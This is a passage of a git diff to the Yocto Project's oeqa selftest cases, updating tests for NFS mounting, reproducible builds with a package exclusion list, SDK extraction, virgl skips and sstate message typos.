raise Exception("Failed to setup NFS mount directory on target")
- mountcmd = "mount -o noac,nfsvers=3,port={0},udp,mountport={1} \"{2}:{3}\" \"{3}\"".format(nfsport, mountport, qemu.server_ip, tmpdir)
+ mountcmd = "mount -o noac,nfsvers=3,port={0},mountport={1} \"{2}:{3}\" \"{3}\"".format(nfsport, mountport, qemu.server_ip, tmpdir)
status, output = qemu.run(mountcmd)
if status != 0:
raise Exception("Failed to setup NFS mount on target ({})".format(repr(output)))
diff --git a/meta/lib/oeqa/selftest/cases/gotoolchain.py b/meta/lib/oeqa/selftest/cases/gotoolchain.py
index 3119520f0d..59f80aad28 100644
--- a/meta/lib/oeqa/selftest/cases/gotoolchain.py
+++ b/meta/lib/oeqa/selftest/cases/gotoolchain.py
@@ -43,6 +43,12 @@ class oeGoToolchainSelfTest(OESelftestTestCase):
@classmethod
def tearDownClass(cls):
+ # Go creates files which are read-only
+ for dirpath, dirnames, filenames in os.walk(cls.tmpdir_SDKQA):
+ for filename in filenames + dirnames:
+ f = os.path.join(dirpath, filename)
+ if not os.path.islink(f):
+ os.chmod(f, 0o775)
shutil.rmtree(cls.tmpdir_SDKQA, ignore_errors=True)
super(oeGoToolchainSelfTest, cls).tearDownClass()
diff --git a/meta/lib/oeqa/selftest/cases/imagefeatures.py b/meta/lib/oeqa/selftest/cases/imagefeatures.py
index 2b9c4998f7..535d80cb86 100644
--- a/meta/lib/oeqa/selftest/cases/imagefeatures.py
+++ b/meta/lib/oeqa/selftest/cases/imagefeatures.py
@@ -240,7 +240,7 @@ USERADD_GID_TABLES += "files/static-group"
def test_no_busybox_base_utils(self):
config = """
# Enable x11
-DISTRO_FEATURES_append += "x11"
+DISTRO_FEATURES_append = " x11"
# Switch to systemd
DISTRO_FEATURES += "systemd"
diff --git a/meta/lib/oeqa/selftest/cases/oelib/elf.py b/meta/lib/oeqa/selftest/cases/oelib/elf.py
index d0a28090f2..5a5f9b4fdf 100644
--- a/meta/lib/oeqa/selftest/cases/oelib/elf.py
+++ b/meta/lib/oeqa/selftest/cases/oelib/elf.py
@@ -21,6 +21,6 @@ class TestElf(TestCase):
self.assertEqual(oe.qa.elf_machine_to_string(0xB7), "AArch64")
self.assertEqual(oe.qa.elf_machine_to_string(0xF7), "BPF")
- self.assertEqual(oe.qa.elf_machine_to_string(0x00), "Unknown (0)")
+ self.assertEqual(oe.qa.elf_machine_to_string(0x00), "Unset")
self.assertEqual(oe.qa.elf_machine_to_string(0xDEADBEEF), "Unknown (3735928559)")
self.assertEqual(oe.qa.elf_machine_to_string("foobar"), "Unknown ('foobar')")
diff --git a/meta/lib/oeqa/selftest/cases/oelib/utils.py b/meta/lib/oeqa/selftest/cases/oelib/utils.py
index a7214beb4c..bbf67bf9c9 100644
--- a/meta/lib/oeqa/selftest/cases/oelib/utils.py
+++ b/meta/lib/oeqa/selftest/cases/oelib/utils.py
@@ -64,7 +64,7 @@ class TestMultiprocessLaunch(TestCase):
import bb
def testfunction(item, d):
- if item == "2" or item == "1":
+ if item == "2":
raise KeyError("Invalid number %s" % item)
return "Found %s" % item
@@ -99,5 +99,4 @@ class TestMultiprocessLaunch(TestCase):
# Assert the function prints exceptions
with captured_output() as (out, err):
self.assertRaises(bb.BBHandledException, multiprocess_launch, testfunction, ["1", "2", "3", "4", "5", "6"], d, extraargs=(d,))
- self.assertIn("KeyError: 'Invalid number 1'", out.getvalue())
self.assertIn("KeyError: 'Invalid number 2'", out.getvalue())
diff --git a/meta/lib/oeqa/selftest/cases/oescripts.py b/meta/lib/oeqa/selftest/cases/oescripts.py
index 726daff7c6..fb99be447e 100644
--- a/meta/lib/oeqa/selftest/cases/oescripts.py
+++ b/meta/lib/oeqa/selftest/cases/oescripts.py
@@ -133,7 +133,8 @@ class OEListPackageconfigTests(OEScriptTests):
def check_endlines(self, results, expected_endlines):
for line in results.output.splitlines():
for el in expected_endlines:
- if line.split() == el.split():
+ if line and line.split()[0] == el.split()[0] and \
+ ' '.join(sorted(el.split())) in ' '.join(sorted(line.split())):
expected_endlines.remove(el)
break
diff --git a/meta/lib/oeqa/selftest/cases/pkgdata.py b/meta/lib/oeqa/selftest/cases/pkgdata.py
index 833a1803ba..254abc40c6 100644
--- a/meta/lib/oeqa/selftest/cases/pkgdata.py
+++ b/meta/lib/oeqa/selftest/cases/pkgdata.py
@@ -218,3 +218,9 @@ class OePkgdataUtilTests(OESelftestTestCase):
def test_specify_pkgdatadir(self):
result = runCmd('oe-pkgdata-util -p %s lookup-pkg zlib' % get_bb_var('PKGDATA_DIR'))
self.assertEqual(result.output, 'libz1')
+
+ def test_no_param(self):
+ result = runCmd('oe-pkgdata-util', ignore_status=True)
+ self.assertEqual(result.status, 2, "Exit status should have been 2. Output: %s" % result.output)
+ currpos = result.output.find('usage: oe-pkgdata-util')
+ self.assertTrue(currpos != -1, msg = "Help text was not displayed in output: %s" % result.output)
diff --git a/meta/lib/oeqa/selftest/cases/prservice.py b/meta/lib/oeqa/selftest/cases/prservice.py
index 85b534963d..fdc1e40058 100644
--- a/meta/lib/oeqa/selftest/cases/prservice.py
+++ b/meta/lib/oeqa/selftest/cases/prservice.py
@@ -23,7 +23,7 @@ class BitbakePrTests(OESelftestTestCase):
package_data_file = os.path.join(self.pkgdata_dir, 'runtime', package_name)
package_data = ftools.read_file(package_data_file)
find_pr = re.search(r"PKGR: r[0-9]+\.([0-9]+)", package_data)
- self.assertTrue(find_pr, "No PKG revision found in %s" % package_data_file)
+ self.assertTrue(find_pr, "No PKG revision found via regex 'PKGR: r[0-9]+\.([0-9]+)' in %s" % package_data_file)
return int(find_pr.group(1))
def get_task_stamp(self, package_name, recipe_task):
@@ -40,7 +40,7 @@ class BitbakePrTests(OESelftestTestCase):
return str(stamps[0])
def increment_package_pr(self, package_name):
- inc_data = "do_package_append() {\n bb.build.exec_func('do_test_prserv', d)\n}\ndo_test_prserv() {\necho \"The current date is: %s\"\n}" % datetime.datetime.now()
+ inc_data = "do_package_append() {\n bb.build.exec_func('do_test_prserv', d)\n}\ndo_test_prserv() {\necho \"The current date is: %s\" > ${PKGDESTWORK}/${PN}.datestamp\n}" % datetime.datetime.now()
self.write_recipeinc(package_name, inc_data)
res = bitbake(package_name, ignore_status=True)
self.delete_recipeinc(package_name)
@@ -63,7 +63,7 @@ class BitbakePrTests(OESelftestTestCase):
pr_2 = self.get_pr_version(package_name)
stamp_2 = self.get_task_stamp(package_name, track_task)
- self.assertTrue(pr_2 - pr_1 == 1, "Step between pkg revisions is not 1 (was %s - %s)" % (pr_2, pr_1))
+ self.assertTrue(pr_2 - pr_1 == 1, "New PR %s did not increment as expected (from %s), difference should be 1" % (pr_2, pr_1))
self.assertTrue(stamp_1 != stamp_2, "Different pkg rev. but same stamp: %s" % stamp_1)
def run_test_pr_export_import(self, package_name, replace_current_db=True):
@@ -75,7 +75,7 @@ class BitbakePrTests(OESelftestTestCase):
exported_db_path = os.path.join(self.builddir, 'export.inc')
export_result = runCmd("bitbake-prserv-tool export %s" % exported_db_path, ignore_status=True)
self.assertEqual(export_result.status, 0, msg="PR Service database export failed: %s" % export_result.output)
- self.assertTrue(os.path.exists(exported_db_path))
+ self.assertTrue(os.path.exists(exported_db_path), msg="%s didn't exist, tool output %s" % (exported_db_path, export_result.output))
if replace_current_db:
current_db_path = os.path.join(get_bb_var('PERSISTENT_DIR'), 'prserv.sqlite3')
@@ -89,7 +89,7 @@ class BitbakePrTests(OESelftestTestCase):
self.increment_package_pr(package_name)
pr_2 = self.get_pr_version(package_name)
- self.assertTrue(pr_2 - pr_1 == 1, "Step between pkg revisions is not 1 (was %s - %s)" % (pr_2, pr_1))
+ self.assertTrue(pr_2 - pr_1 == 1, "New PR %s did not increment as expected (from %s), difference should be 1" % (pr_2, pr_1))
def test_import_export_replace_db(self):
self.run_test_pr_export_import('m4')
diff --git a/meta/lib/oeqa/selftest/cases/pseudo.py b/meta/lib/oeqa/selftest/cases/pseudo.py
new file mode 100644
index 0000000000..33593d5ce9
--- /dev/null
+++ b/meta/lib/oeqa/selftest/cases/pseudo.py
@@ -0,0 +1,27 @@
+#
+# SPDX-License-Identifier: MIT
+#
+
+import glob
+import os
+import shutil
+from oeqa.utils.commands import bitbake, get_test_layer
+from oeqa.selftest.case import OESelftestTestCase
+
+class Pseudo(OESelftestTestCase):
+
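+ # The pseudo-pyc-test recipe imports one test module outside of pseudo and another under pseudo; only the former should leave a .pyc file in the layer's __pycache__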
+ def test_pseudo_pyc_creation(self):
+ self.write_config("")
+
+ metaselftestpath = get_test_layer()
+ pycache_path = os.path.join(metaselftestpath, 'lib/__pycache__')
+ if os.path.exists(pycache_path):
+ shutil.rmtree(pycache_path)
+
+ bitbake('pseudo-pyc-test -c install')
+
+ test1_pyc_present = len(glob.glob(os.path.join(pycache_path, 'pseudo_pyc_test1.*.pyc')))
+ self.assertTrue(test1_pyc_present, 'test1 pyc file missing, should be created outside of pseudo context.')
+
+ test2_pyc_present = len(glob.glob(os.path.join(pycache_path, 'pseudo_pyc_test2.*.pyc')))
+ self.assertFalse(test2_pyc_present, 'test2 pyc file present, should not be created in pseudo context.')
diff --git a/meta/lib/oeqa/selftest/cases/recipetool.py b/meta/lib/oeqa/selftest/cases/recipetool.py
index c2ade2543a..e8aeea3023 100644
--- a/meta/lib/oeqa/selftest/cases/recipetool.py
+++ b/meta/lib/oeqa/selftest/cases/recipetool.py
@@ -370,7 +370,7 @@ class RecipetoolTests(RecipetoolBase):
tempsrc = os.path.join(self.tempdir, 'srctree')
os.makedirs(tempsrc)
recipefile = os.path.join(self.tempdir, 'libmatchbox.bb')
- srcuri = 'git://git.yoctoproject.org/libmatchbox'
+ srcuri = 'git://git.yoctoproject.org/libmatchbox;branch=master'
result = runCmd(['recipetool', 'create', '-o', recipefile, srcuri + ";rev=9f7cf8895ae2d39c465c04cc78e918c157420269", '-x', tempsrc])
self.assertTrue(os.path.isfile(recipefile), 'recipetool did not create recipe file; output:\n%s' % result.output)
checkvars = {}
@@ -456,7 +456,7 @@ class RecipetoolTests(RecipetoolBase):
self.assertTrue(os.path.isfile(recipefile))
checkvars = {}
checkvars['LICENSE'] = set(['Apache-2.0'])
- checkvars['SRC_URI'] = 'git://github.com/mesonbuild/meson;protocol=https'
+ checkvars['SRC_URI'] = 'git://github.com/mesonbuild/meson;protocol=https;branch=master'
inherits = ['setuptools3']
self._test_recipe_contents(recipefile, checkvars, inherits)
@@ -523,7 +523,7 @@ class RecipetoolTests(RecipetoolBase):
self.assertTrue(os.path.isfile(recipefile))
checkvars = {}
checkvars['LICENSE'] = set(['GPLv2'])
- checkvars['SRC_URI'] = 'git://git.yoctoproject.org/git/matchbox-terminal;protocol=http'
+ checkvars['SRC_URI'] = 'git://git.yoctoproject.org/git/matchbox-terminal;protocol=http;branch=master'
inherits = ['pkgconfig', 'autotools']
self._test_recipe_contents(recipefile, checkvars, inherits)
diff --git a/meta/lib/oeqa/selftest/cases/reproducible.py b/meta/lib/oeqa/selftest/cases/reproducible.py
index 5d3959be77..be4cdcc429 100644
--- a/meta/lib/oeqa/selftest/cases/reproducible.py
+++ b/meta/lib/oeqa/selftest/cases/reproducible.py
@@ -17,6 +17,57 @@ import stat
import os
import datetime
+# For sample packages, see:
+# https://autobuilder.yocto.io/pub/repro-fail/oe-reproducible-20201127-0t7wr_oo/
+# https://autobuilder.yocto.io/pub/repro-fail/oe-reproducible-20201127-4s9ejwyp/
+# https://autobuilder.yocto.io/pub/repro-fail/oe-reproducible-20201127-haiwdlbr/
+# https://autobuilder.yocto.io/pub/repro-fail/oe-reproducible-20201127-hwds3mcl/
+# https://autobuilder.yocto.io/pub/repro-fail/oe-reproducible-20201203-sua0pzvc/
+# (both packages/ and packages-excluded/)
+exclude_packages = [
+ 'acpica-src',
+ 'babeltrace2-ptest',
+ 'bind',
+ 'bootchart2-doc',
+ 'epiphany',
+ 'gcr',
+ 'glide',
+ 'go-dep',
+ 'go-helloworld',
+ 'go-runtime',
+ 'go_',
+ 'gstreamer1.0-python',
+ 'hwlatdetect',
+ 'kernel-devsrc',
+ 'libcap-ng',
+ 'libjson',
+ 'libproxy',
+ 'lttng-tools-dbg',
+ 'lttng-tools-ptest',
+ 'ltp',
+ 'ovmf-shell-efi',
+ 'parted-ptest',
+ 'perf',
+ 'piglit',
+ 'pybootchartgui',
+ 'qemu',
+ 'quilt-ptest',
+ 'rsync',
+ 'ruby',
+ 'stress-ng',
+ 'systemd-bootchart',
+ 'systemtap',
+ 'valgrind-ptest',
+ 'webkitgtk',
+ ]
+
+def is_excluded(package):
+ package_name = os.path.basename(package)
+ for i in exclude_packages:
+ if package_name.startswith(i):
+ return i
+ return None
+
MISSING = 'MISSING'
DIFFERENT = 'DIFFERENT'
SAME = 'SAME'
@@ -39,14 +90,21 @@ class PackageCompareResults(object):
self.total = []
self.missing = []
self.different = []
+ self.different_excluded = []
self.same = []
+ self.active_exclusions = set()
def add_result(self, r):
self.total.append(r)
if r.status == MISSING:
self.missing.append(r)
elif r.status == DIFFERENT:
- self.different.append(r)
+ exclusion = is_excluded(r.reference)
+ if exclusion:
+ self.different_excluded.append(r)
+ self.active_exclusions.add(exclusion)
+ else:
+ self.different.append(r)
else:
self.same.append(r)
@@ -54,10 +112,14 @@ class PackageCompareResults(object):
self.total.sort()
self.missing.sort()
self.different.sort()
+ self.different_excluded.sort()
self.same.sort()
def __str__(self):
- return 'same=%i different=%i missing=%i total=%i' % (len(self.same), len(self.different), len(self.missing), len(self.total))
+ return 'same=%i different=%i different_excluded=%i missing=%i total=%i\nunused_exclusions=%s' % (len(self.same), len(self.different), len(self.different_excluded), len(self.missing), len(self.total), self.unused_exclusions())
+
+ def unused_exclusions(self):
+ return sorted(set(exclude_packages) - self.active_exclusions)
def compare_file(reference, test, diffutils_sysroot):
result = CompareResult()
@@ -68,7 +130,7 @@ def compare_file(reference, test, diffutils_sysroot):
result.status = MISSING
return result
- r = runCmd(['cmp', '--quiet', reference, test], native_sysroot=diffutils_sysroot, ignore_status=True)
+ r = runCmd(['cmp', '--quiet', reference, test], native_sysroot=diffutils_sysroot, ignore_status=True, sync=False)
if r.status:
result.status = DIFFERENT
@@ -77,9 +139,41 @@ def compare_file(reference, test, diffutils_sysroot):
result.status = SAME
return result
+def run_diffoscope(a_dir, b_dir, html_dir, **kwargs):
+ return runCmd(['diffoscope', '--no-default-limits', '--exclude-directory-metadata', 'yes', '--html-dir', html_dir, a_dir, b_dir],
+ **kwargs)
+
+class DiffoscopeTests(OESelftestTestCase):
+ diffoscope_test_files = os.path.join(os.path.dirname(os.path.abspath(__file__)), "diffoscope")
+
+ def test_diffoscope(self):
+ bitbake("diffoscope-native -c addto_recipe_sysroot")
+ diffoscope_sysroot = get_bb_var("RECIPE_SYSROOT_NATIVE", "diffoscope-native")
+
+ # Check that diffoscope doesn't return an error when the files compare
+ # the same (a general check that diffoscope is working)
+ with tempfile.TemporaryDirectory() as tmpdir:
+ run_diffoscope('A', 'A', tmpdir,
+ native_sysroot=diffoscope_sysroot, cwd=self.diffoscope_test_files)
+
+ # Check that diffoscope generates an index.html file when the files are
+ # different
+ with tempfile.TemporaryDirectory() as tmpdir:
+ r = run_diffoscope('A', 'B', tmpdir,
+ native_sysroot=diffoscope_sysroot, ignore_status=True, cwd=self.diffoscope_test_files)
+
+ self.assertNotEqual(r.status, 0, msg="diffoscope was successful when an error was expected")
+ self.assertTrue(os.path.exists(os.path.join(tmpdir, 'index.html')), "HTML index not found!")
+
class ReproducibleTests(OESelftestTestCase):
+ # Test the reproducibility of whatever is built between sstate_targets and targets
+
package_classes = ['deb', 'ipk']
- images = ['core-image-minimal', 'core-image-sato', 'core-image-full-cmdline']
+
+ # targets are the things we want to test the reproducibility of
+ targets = ['core-image-minimal', 'core-image-sato', 'core-image-full-cmdline', 'world']
+ # sstate targets are things to pull from sstate to potentially cut build/debugging time
+ sstate_targets = []
save_results = False
if 'OEQA_DEBUGGING_SAVED_OUTPUT' in os.environ:
save_results = os.environ['OEQA_DEBUGGING_SAVED_OUTPUT']
@@ -94,7 +188,7 @@ class ReproducibleTests(OESelftestTestCase):
def setUpLocal(self):
super().setUpLocal()
- needed_vars = ['TOPDIR', 'TARGET_PREFIX', 'BB_NUMBER_THREADS']
+ needed_vars = ['TOPDIR', 'TARGET_PREFIX', 'BB_NUMBER_THREADS', 'BB_HASHSERVE']
bb_vars = get_bb_vars(needed_vars)
for v in needed_vars:
setattr(self, v.lower(), bb_vars[v])
@@ -150,20 +244,29 @@ class ReproducibleTests(OESelftestTestCase):
PACKAGE_CLASSES = "{package_classes}"
INHIBIT_PACKAGE_STRIP = "1"
TMPDIR = "{tmpdir}"
+ LICENSE_FLAGS_WHITELIST = "commercial"
+ DISTRO_FEATURES_append = ' systemd pam'
''').format(package_classes=' '.join('package_%s' % c for c in self.package_classes),
tmpdir=tmpdir)
if not use_sstate:
+ if self.sstate_targets:
+ self.logger.info("Building prebuild for %s (sstate allowed)..." % (name))
+ self.write_config(config)
+ bitbake(' '.join(self.sstate_targets))
+
# This config fragment will disable using shared and the sstate
# mirror, forcing a complete build from scratch
config += textwrap.dedent('''\
SSTATE_DIR = "${TMPDIR}/sstate"
- SSTATE_MIRROR = ""
+ SSTATE_MIRRORS = "file://.*/.*-native.* http://sstate.yoctoproject.org/all/PATH;downloadfilename=PATH file://.*/.*-cross.* http://sstate.yoctoproject.org/all/PATH;downloadfilename=PATH"
''')
+ self.logger.info("Building %s (sstate%s allowed)..." % (name, '' if use_sstate else ' NOT'))
self.write_config(config)
d = get_bb_vars(capture_vars)
- bitbake(' '.join(self.images))
+ # targets used to be called images
+ bitbake(' '.join(getattr(self, 'images', self.targets)))
return d
def test_reproducible_builds(self):
@@ -187,6 +290,7 @@ class ReproducibleTests(OESelftestTestCase):
self.logger.info('Non-reproducible packages will be copied to %s', save_dir)
vars_A = self.do_test_build('reproducibleA', self.build_from_sstate)
+
vars_B = self.do_test_build('reproducibleB', False)
# NOTE: The temp directories from the reproducible build are purposely
@@ -201,6 +305,7 @@ class ReproducibleTests(OESelftestTestCase):
deploy_A = vars_A['DEPLOY_DIR_' + c.upper()]
deploy_B = vars_B['DEPLOY_DIR_' + c.upper()]
+ self.logger.info('Checking %s packages for differences...' % c)
result = self.compare_packages(deploy_A, deploy_B, diffutils_sysroot)
self.logger.info('Reproducibility summary for %s: %s' % (c, result))
@@ -209,6 +314,7 @@ class ReproducibleTests(OESelftestTestCase):
self.write_package_list(package_class, 'missing', result.missing)
self.write_package_list(package_class, 'different', result.different)
+ self.write_package_list(package_class, 'different_excluded', result.different_excluded)
self.write_package_list(package_class, 'same', result.same)
if self.save_results:
@@ -216,8 +322,12 @@ class ReproducibleTests(OESelftestTestCase):
self.copy_file(d.reference, '/'.join([save_dir, 'packages', strip_topdir(d.reference)]))
self.copy_file(d.test, '/'.join([save_dir, 'packages', strip_topdir(d.test)]))
+ for d in result.different_excluded:
+ self.copy_file(d.reference, '/'.join([save_dir, 'packages-excluded', strip_topdir(d.reference)]))
+ self.copy_file(d.test, '/'.join([save_dir, 'packages-excluded', strip_topdir(d.test)]))
+
if result.missing or result.different:
- fails.append("The following %s packages are missing or different: %s" %
+ fails.append("The following %s packages are missing or different and not in exclusion list: %s" %
(c, '\n'.join(r.test for r in (result.missing + result.different))))
# Clean up empty directories
@@ -232,7 +342,7 @@ class ReproducibleTests(OESelftestTestCase):
# Copy jquery to improve the diffoscope output usability
self.copy_file(os.path.join(jquery_sysroot, 'usr/share/javascript/jquery/jquery.min.js'), os.path.join(package_html_dir, 'jquery.js'))
- runCmd(['diffoscope', '--no-default-limits', '--exclude-directory-metadata', '--html-dir', package_html_dir, 'reproducibleA', 'reproducibleB'],
+ run_diffoscope('reproducibleA', 'reproducibleB', package_html_dir,
native_sysroot=diffoscope_sysroot, ignore_status=True, cwd=package_dir)
if fails:
diff --git a/meta/lib/oeqa/selftest/cases/runcmd.py b/meta/lib/oeqa/selftest/cases/runcmd.py
index fa6113d7fa..e9612389fe 100644
--- a/meta/lib/oeqa/selftest/cases/runcmd.py
+++ b/meta/lib/oeqa/selftest/cases/runcmd.py
@@ -27,8 +27,8 @@ class RunCmdTests(OESelftestTestCase):
# The delta is intentionally smaller than the timeout, to detect cases where
# we incorrectly apply the timeout more than once.
- TIMEOUT = 5
- DELTA = 3
+ TIMEOUT = 10
+ DELTA = 8
def test_result_okay(self):
result = runCmd("true")
diff --git a/meta/lib/oeqa/selftest/cases/runqemu.py b/meta/lib/oeqa/selftest/cases/runqemu.py
index 7e676bcb41..da22f77b27 100644
--- a/meta/lib/oeqa/selftest/cases/runqemu.py
+++ b/meta/lib/oeqa/selftest/cases/runqemu.py
@@ -163,12 +163,11 @@ class QemuTest(OESelftestTestCase):
bitbake(cls.recipe)
def _start_qemu_shutdown_check_if_shutdown_succeeded(self, qemu, timeout):
+ # Allow the runner's LoggingThread instance to exit without errors
+ # (such as the exception "Console connection closed unexpectedly")
+ # as qemu will disappear when we shut it down
+ qemu.runner.allowexit()
qemu.run_serial("shutdown -h now")
- # Stop thread will stop the LoggingThread instance used for logging
- # qemu through serial console, stop thread will prevent this code
- # from facing exception (Console connection closed unexpectedly)
- # when qemu was shutdown by the above shutdown command
- qemu.runner.stop_thread()
time_track = 0
try:
while True:
diff --git a/meta/lib/oeqa/selftest/cases/runtime_test.py b/meta/lib/oeqa/selftest/cases/runtime_test.py
index cd03069340..cc4190c1d6 100644
--- a/meta/lib/oeqa/selftest/cases/runtime_test.py
+++ b/meta/lib/oeqa/selftest/cases/runtime_test.py
@@ -14,11 +14,6 @@ from oeqa.core.decorator.data import skipIfNotQemu
class TestExport(OESelftestTestCase):
- @classmethod
- def tearDownClass(cls):
- runCmd("rm -rf /tmp/sdk")
- super(TestExport, cls).tearDownClass()
-
def test_testexport_basic(self):
"""
Summary: Check basic testexport functionality with only ping test enabled.
@@ -95,19 +90,20 @@ class TestExport(OESelftestTestCase):
msg = "Couldn't find SDK tarball: %s" % tarball_path
self.assertEqual(os.path.isfile(tarball_path), True, msg)
- # Extract SDK and run tar from SDK
- result = runCmd("%s -y -d /tmp/sdk" % tarball_path)
- self.assertEqual(0, result.status, "Couldn't extract SDK")
+ with tempfile.TemporaryDirectory() as tmpdirname:
+ # Extract SDK and run tar from SDK
+ result = runCmd("%s -y -d %s" % (tarball_path, tmpdirname))
+ self.assertEqual(0, result.status, "Couldn't extract SDK")
- env_script = result.output.split()[-1]
- result = runCmd(". %s; which tar" % env_script, shell=True)
- self.assertEqual(0, result.status, "Couldn't setup SDK environment")
- is_sdk_tar = True if "/tmp/sdk" in result.output else False
- self.assertTrue(is_sdk_tar, "Couldn't setup SDK environment")
+ env_script = result.output.split()[-1]
+ result = runCmd(". %s; which tar" % env_script, shell=True)
+ self.assertEqual(0, result.status, "Couldn't setup SDK environment")
+ is_sdk_tar = True if tmpdirname in result.output else False
+ self.assertTrue(is_sdk_tar, "Couldn't setup SDK environment")
- tar_sdk = result.output
- result = runCmd("%s --version" % tar_sdk)
- self.assertEqual(0, result.status, "Couldn't run tar from SDK")
+ tar_sdk = result.output
+ result = runCmd("%s --version" % tar_sdk)
+ self.assertEqual(0, result.status, "Couldn't run tar from SDK")
class TestImage(OESelftestTestCase):
@@ -161,6 +157,7 @@ class TestImage(OESelftestTestCase):
features += 'PACKAGE_FEED_GPG_NAME = "testuser"\n'
features += 'PACKAGE_FEED_GPG_PASSPHRASE_FILE = "%s"\n' % os.path.join(signing_key_dir, 'key.passphrase')
features += 'GPG_PATH = "%s"\n' % self.gpg_home
+ features += 'PSEUDO_IGNORE_PATHS .= ",%s"\n' % self.gpg_home
self.write_config(features)
# Build core-image-sato and testimage
@@ -178,12 +175,24 @@ class TestImage(OESelftestTestCase):
if "DISPLAY" not in os.environ:
self.skipTest("virgl gtk test must be run inside a X session")
distro = oe.lsb.distro_identifier()
+ if distro and distro.startswith('almalinux'):
+ self.skipTest('virgl isn\'t working with Alma Linux')
+ if distro and distro.startswith('rocky'):
+ self.skipTest('virgl isn\'t working with Rocky Linux')
if distro and distro == 'debian-8':
self.skipTest('virgl isn\'t working with Debian 8')
if distro and distro == 'centos-7':
self.skipTest('virgl isn\'t working with Centos 7')
+ if distro and distro == 'centos-8':
+ self.skipTest('virgl isn\'t working with Centos 8')
+ if distro and distro.startswith('fedora'):
+ self.skipTest('virgl isn\'t working with Fedora')
if distro and distro == 'opensuseleap-15.0':
self.skipTest('virgl isn\'t working with Opensuse 15.0')
+ if distro and distro == 'ubuntu-22.04':
+ self.skipTest('virgl isn\'t working with Ubuntu 22.04')
+ if distro and distro == 'ubuntu-22.10':
+ self.skipTest('virgl isn\'t working with Ubuntu 22.10')
qemu_packageconfig = get_bb_var('PACKAGECONFIG', 'qemu-system-native')
sdl_packageconfig = get_bb_var('PACKAGECONFIG', 'libsdl2-native')
@@ -219,6 +228,7 @@ class TestImage(OESelftestTestCase):
Author: Alexander Kanavin <alex.kanavin@gmail.com>
"""
import subprocess, os
+ self.skipTest("Crashes in mesa observed with this test on dunfell: https://bugzilla.yoctoproject.org/show_bug.cgi?id=14527")
try:
content = os.listdir("/dev/dri")
if len([i for i in content if i.startswith('render')]) == 0:
@@ -226,7 +236,7 @@ class TestImage(OESelftestTestCase):
except FileNotFoundError:
self.skipTest("/dev/dri directory does not exist; no render nodes available on this machine.")
try:
- dripath = subprocess.check_output("pkg-config --variable=dridriverdir dri", shell=True)
+ dripath = subprocess.check_output("PATH=/bin:/usr/bin:$PATH pkg-config --variable=dridriverdir dri", shell=True)
except subprocess.CalledProcessError as e:
self.skipTest("Could not determine the path to dri drivers on the host via pkg-config.\nPlease install Mesa development files (particularly, dri.pc) on the host machine.")
qemu_packageconfig = get_bb_var('PACKAGECONFIG', 'qemu-system-native')
diff --git a/meta/lib/oeqa/selftest/cases/sstatetests.py b/meta/lib/oeqa/selftest/cases/sstatetests.py
index c46e8ba489..1bfe88c87d 100644
--- a/meta/lib/oeqa/selftest/cases/sstatetests.py
+++ b/meta/lib/oeqa/selftest/cases/sstatetests.py
@@ -39,7 +39,7 @@ class SStateTests(SStateBase):
recipefile = os.path.join(tempdir, "recipes-test", "dbus-wait-test", 'dbus-wait-test_git.bb')
os.makedirs(os.path.dirname(recipefile))
- srcuri = 'git://' + srcdir + ';protocol=file'
+ srcuri = 'git://' + srcdir + ';protocol=file;branch=master'
result = runCmd(['recipetool', 'create', '-o', recipefile, srcuri])
self.assertTrue(os.path.isfile(recipefile), 'recipetool did not create recipe file; output:\n%s' % result.output)
@@ -137,7 +137,7 @@ class SStateTests(SStateBase):
filtered_results.append(r)
self.assertTrue(filtered_results == [], msg="Found distro non-specific sstate for: %s (%s)" % (', '.join(map(str, targets)), str(filtered_results)))
file_tracker_1 = self.search_sstate('|'.join(map(str, [s + r'.*?\.tgz$' for s in targets])), distro_specific=True, distro_nonspecific=False)
- self.assertTrue(len(file_tracker_1) >= len(targets), msg = "Not all sstate files ware created for: %s" % ', '.join(map(str, targets)))
+ self.assertTrue(len(file_tracker_1) >= len(targets), msg = "Not all sstate files were created for: %s" % ', '.join(map(str, targets)))
self.track_for_cleanup(self.distro_specific_sstate + "_old")
shutil.copytree(self.distro_specific_sstate, self.distro_specific_sstate + "_old")
@@ -146,13 +146,13 @@ class SStateTests(SStateBase):
bitbake(['-cclean'] + targets)
bitbake(targets)
file_tracker_2 = self.search_sstate('|'.join(map(str, [s + r'.*?\.tgz$' for s in targets])), distro_specific=True, distro_nonspecific=False)
- self.assertTrue(len(file_tracker_2) >= len(targets), msg = "Not all sstate files ware created for: %s" % ', '.join(map(str, targets)))
+ self.assertTrue(len(file_tracker_2) >= len(targets), msg = "Not all sstate files were created for: %s" % ', '.join(map(str, targets)))
not_recreated = [x for x in file_tracker_1 if x not in file_tracker_2]
- self.assertTrue(not_recreated == [], msg="The following sstate files ware not recreated: %s" % ', '.join(map(str, not_recreated)))
+ self.assertTrue(not_recreated == [], msg="The following sstate files were not recreated: %s" % ', '.join(map(str, not_recreated)))
created_once = [x for x in file_tracker_2 if x not in file_tracker_1]
- self.assertTrue(created_once == [], msg="The following sstate files ware created only in the second run: %s" % ', '.join(map(str, created_once)))
+ self.assertTrue(created_once == [], msg="The following sstate files were created only in the second run: %s" % ', '.join(map(str, created_once)))
def test_rebuild_distro_specific_sstate_cross_native_targets(self):
self.run_test_rebuild_distro_specific_sstate(['binutils-cross-' + self.tune_arch, 'binutils-native'], temp_sstate_location=True)
@@ -202,9 +202,9 @@ class SStateTests(SStateBase):
actual_remaining_sstate = [x for x in self.search_sstate(target + r'.*?\.tgz$') if not any(pattern in x for pattern in ignore_patterns)]
actual_not_expected = [x for x in actual_remaining_sstate if x not in expected_remaining_sstate]
- self.assertFalse(actual_not_expected, msg="Files should have been removed but ware not: %s" % ', '.join(map(str, actual_not_expected)))
+ self.assertFalse(actual_not_expected, msg="Files should have been removed but were not: %s" % ', '.join(map(str, actual_not_expected)))
expected_not_actual = [x for x in expected_remaining_sstate if x not in actual_remaining_sstate]
- self.assertFalse(expected_not_actual, msg="Extra files ware removed: %s" ', '.join(map(str, expected_not_actual)))
+ self.assertFalse(expected_not_actual, msg="Extra files were removed: %s" % ', '.join(map(str, expected_not_actual)))
def test_sstate_cache_management_script_using_pr_1(self):
global_config = []
diff --git a/meta/lib/oeqa/selftest/cases/tinfoil.py b/meta/lib/oeqa/selftest/cases/tinfoil.py
index 206168ed00..6668d7cdc8 100644
--- a/meta/lib/oeqa/selftest/cases/tinfoil.py
+++ b/meta/lib/oeqa/selftest/cases/tinfoil.py
@@ -65,6 +65,20 @@ class TinfoilTests(OESelftestTestCase):
localdata.setVar('PN', 'hello')
self.assertEqual('hello', localdata.getVar('BPN'))
